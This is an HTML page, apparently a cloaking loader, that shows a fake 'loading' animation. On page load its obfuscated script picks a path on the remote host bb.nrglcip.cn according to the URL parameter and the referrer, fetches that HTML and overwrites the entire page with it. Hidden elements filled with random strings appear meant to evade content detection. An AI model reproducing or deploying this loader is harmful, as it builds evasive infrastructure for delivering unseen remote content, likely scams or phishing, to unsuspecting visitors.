<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .KMdM5fPt {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .KMdM5fPt .m7DXj2Jr1TY {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .KMdM5fPt .content {
            line-height: 50px;
            text-align: center
        }

        .KMdM5fPt .img {
            width: 100%
        }

        .KMdM5fPt .vVhq4SJn {
            text-align: center
        }

        .KMdM5fPt .vVhq4SJn span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .KMdM5fPt .vVhq4SJn span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .KMdM5fPt .vVhq4SJn span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .KMdM5fPt .vVhq4SJn span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .KMdM5fPt .vVhq4SJn span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .KMdM5fPt .vVhq4SJn span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .KMdM5fPt .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function jbUZRbWcl(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Y5P8NXW = jbUZRbWcl('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Y5P8NXW +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Y5P8NXW +".html?a=share";
		}
		
        rQFFwSQd1=url+"#"+new Date().getTime();
        rQFFwSQd1 && function() {
            $.get(rQFFwSQd1, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>LzcEclVfpxjeRvodA61yh</a>
<img  src='' style='display:none'>
<div style='display:none'>q5vAITh4cqCwGdZEhc9xuL</div>
<ul style='display:none' >hul5g95ekhZIB</ul>
<h1 style='display:none' >V51QXkbcAeC8pFEm6WwMYOuRO</h1>
<ul style='display:none' >hul5g95ekhZIB</ul>
<h1 style='display:none' >V51QXkbcAeC8pFEm6WwMYOuRO</h1><div class="KMdM5fPt">
    <div class="m7DXj2Jr1TY">
        <div class="vVhq4SJn">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >eOyyntTCCOk1qCnhcLqsjikA4157qoK3frOTDQERlt</li>
<ul style='display:none' >J4aw4GE7bwHMOxdb8Chi0DYtpR9BcKmKnOUEgQBGNeR7sAWCNDT1vALmDIi0FWZZpsJeFOD</ul>
<span style='display:none'>vr7WAJelTKq9V0zPxDdADs6AtVRxmhAJnhaLvoDB8zVycUQn3wbY4pInSAAeGigaUBmH2kElEn6IaA6EGur5eWV5d1653kHXI8mW</span>
<h1 style='display:none' >A0o3RCtqIf5qHxi</h1>
<span style='display:none'>vr7WAJelTKq9V0zPxDdADs6AtVRxmhAJnhaLvoDB8zVycUQn3wbY4pInSAAeGigaUBmH2kElEn6IaA6EGur5eWV5d1653kHXI8mW</span>
<ul style='display:none' >J4aw4GE7bwHMOxdb8Chi0DYtpR9BcKmKnOUEgQBGNeR7sAWCNDT1vALmDIi0FWZZpsJeFOD</ul>
<p  style='display:none'>CKhxLUpGWyedYeEPCwynd0wZhMk4EFa0MXuh897maaFmpZkYWyfDsfy5GX8fLhFSY</p>
<ul style='display:none' >J4aw4GE7bwHMOxdb8Chi0DYtpR9BcKmKnOUEgQBGNeR7sAWCNDT1vALmDIi0FWZZpsJeFOD</ul></body>
</html>